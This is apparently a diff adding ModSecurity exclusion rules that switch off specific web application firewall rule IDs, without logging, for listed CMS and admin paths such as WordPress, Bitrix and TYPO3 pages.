+SecRule REQUEST_FILENAME "/parsechecker\.php" "phase:2,id:92353,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/document_general\.php" "phase:2,id:92354,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/lib/exe/ajax\.php" "phase:2,id:92355,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/quickview\.aspx" "phase:2,id:92356,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=390614"
+
+SecRule REQUEST_FILENAME "/tce_file\.php" "phase:2,id:92357,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/admin/updatepage\.php" "phase:2,id:92358,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/modules/widget_engine\.php" "phase:2,id:92359,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/v2_news_engine\.php" "phase:2,id:92360,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/db_routines\.php" "phase:2,id:92361,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/cmd/pagina\.php" "phase:2,id:92362,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/advcp/" "phase:2,id:92363,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/0101_change_text\.php" "phase:2,id:92364,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/0104_dupicate\.php" "phase:2,id:92365,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/0101_change_text\.php" "phase:2,id:92366,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/0104_duplicate\.php" "phase:2,id:92367,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/0101_change\.php" "phase:2,id:92368,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/0101_change_news\.php" "phase:2,id:92369,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/reviews/uploadproduct\.php" "phase:2,id:92370,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/redaxo/index\.php" "phase:2,id:92371,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:92372,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/property-details\.php" "phase:2,id:92373,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/artikel/" "phase:2,id:92374,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/editieren_grunddaten\.php" "phase:2,id:92375,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/contao/main\.php" "phase:2,id:92376,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/seo-report\.php" "phase:2,id:92377,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/site_links\.php" "phase:2,id:92378,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/wp-admin/network/themes\.php" "phase:2,id:92379,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/previewtemplate\.php" "phase:2,id:92380,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/distributors/edit\.php" "phase:2,id:92381,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/deref\.php" "phase:2,id:92382,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162"
+
+SecRule REQUEST_FILENAME "/gr_radiostatus_panel/" "phase:2,id:92383,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/typo3/mod\.php" "phase:2,id:92384,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/addmodifyeventui\.php" "phase:2,id:92385,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/addmodifyeventuim\.php" "phase:2,id:92386,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/deleteeventui\.php" "phase:2,id:92387,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/deleteeventuim\.php" "phase:2,id:92388,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/addmodifyblogui\.php" "phase:2,id:92389,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/addmodifybloguim\.php" "phase:2,id:92390,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/bug_update\.php" "phase:2,id:92391,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/func/get-members\.php" "phase:2,id:92392,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340003"
+
+SecRule REQUEST_FILENAME "/update_page\.php" "phase:2,id:92393,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/abf-db\.php" "phase:2,id:92394,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/checkout_yourinfo\.php" "phase:2,id:92395,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/adminhandler\.php" "phase:2,id:92396,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/sadmin/" "phase:2,id:92397,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340113"
+
+SecRule REQUEST_FILENAME "/cms/editcentre\.php" "phase:2,id:92398,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113"
+
+SecRule REQUEST_FILENAME "/admin/content/widget" "phase:2,id:92399,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113"
+
+SecRule REQUEST_FILENAME "/wp-change_domain\.php" "phase:2,id:92400,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/pagetext/edit\.php" "phase:2,id:92401,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113"
+
+SecRule REQUEST_FILENAME "/cms/actueel\.php" "phase:2,id:92402,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/cws-pb/" "phase:2,id:92403,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/public_file_edit\.php" "phase:2,id:92404,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/editgall\.php" "phase:2,id:92405,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/mod/quiz/" "phase:2,id:92406,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/integration/service\.php" "phase:2,id:92407,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/create_question\.php" "phase:2,id:92408,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/wpfb-ajax\.php" "phase:2,id:92409,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/branding\.php" "phase:2,id:92410,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/jackbox_social\.php" "phase:2,id:92411,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/wp-admin/customize\.php" "phase:2,id:92412,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/blog/import" "phase:2,id:92413,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/system/ajax" "phase:2,id:92414,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/admin/prodedit\.php" "phase:2,id:92415,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cometchat/admin/" "phase:2,id:92416,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cgi-bin/dada/plugins/bridge\.cgi" "phase:2,id:92417,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cms/addcentre\.php" "phase:2,id:92418,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/edit_orders_tax\.php" "phase:2,id:92419,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/whmadmcp/addonmodules\.php" "phase:2,id:92420,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "property-edit-handler\.php" "phase:2,id:92421,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/admin/admin_settings_save\.php" "phase:2,id:92422,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/send\.email\.do\.php" "phase:2,id:92423,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/homepage\.php" "phase:2,id:92424,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/backwpup/job/job_run\.php" "phase:2,id:92425,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/project/install/handle_ajax" "phase:2,id:92426,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/cometchat_send\.php" "phase:2,id:92427,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/social_slider_panel/admin\.php" "phase:2,id:92428,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340464,ctl:ruleRemovebyID=340465"
+
+SecRule REQUEST_FILENAME "/ga_node_subserver\.php" "phase:2,id:92429,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/bitrix/admin/fileman_file_edit\.php" "phase:2,id:92430,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/bitrix/tools/autosave\.php" "phase:2,id:92431,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/wp-admin/plugin-editor\.php" "phase:2,id:92432,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340213"
+
+SecRule REQUEST_FILENAME "/admin/picaimport\.php" "phase:2,id:92433,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/backend/event_insert" "phase:2,id:92434,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/build_email" "phase:2,id:92435,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/sadmin/responsivefilemanager" "phase:2,id:92436,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/fixddbb\.php" "phase:2,id:92437,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/ajax_upload/" "phase:2,id:92438,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
